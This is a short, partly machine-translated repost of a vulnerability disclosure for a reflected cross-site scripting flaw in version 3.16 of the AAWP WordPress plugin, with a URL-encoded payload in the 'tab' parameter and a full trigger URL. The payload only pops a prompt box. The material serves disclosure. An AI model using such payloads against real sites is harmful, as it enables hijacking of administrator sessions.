当前位置:网站首页>WordPress aawp 3.16 cross site scripting

WordPress aawp 3.16 cross site scripting

2022-06-23 06:07:00 Khan security team

supply ​​ Business Homepage :https://getaawp.com/

Software link :https://getaawp.com/

edition :3.16

Tested on :Windows 10 - Chrome、WordPress 5.8.2

Proof of concept :

1- Install and activate AAWP 3.16 plug-in unit .

2- go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX

3- add to payload To Tab,XSS Payload:%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y

4- XSS Has been triggered .

Go to this URL “http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22 %40x.y" XSS Will trigger .

原网站

版权声明
本文为[Khan security team]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/01/202201141604247202.html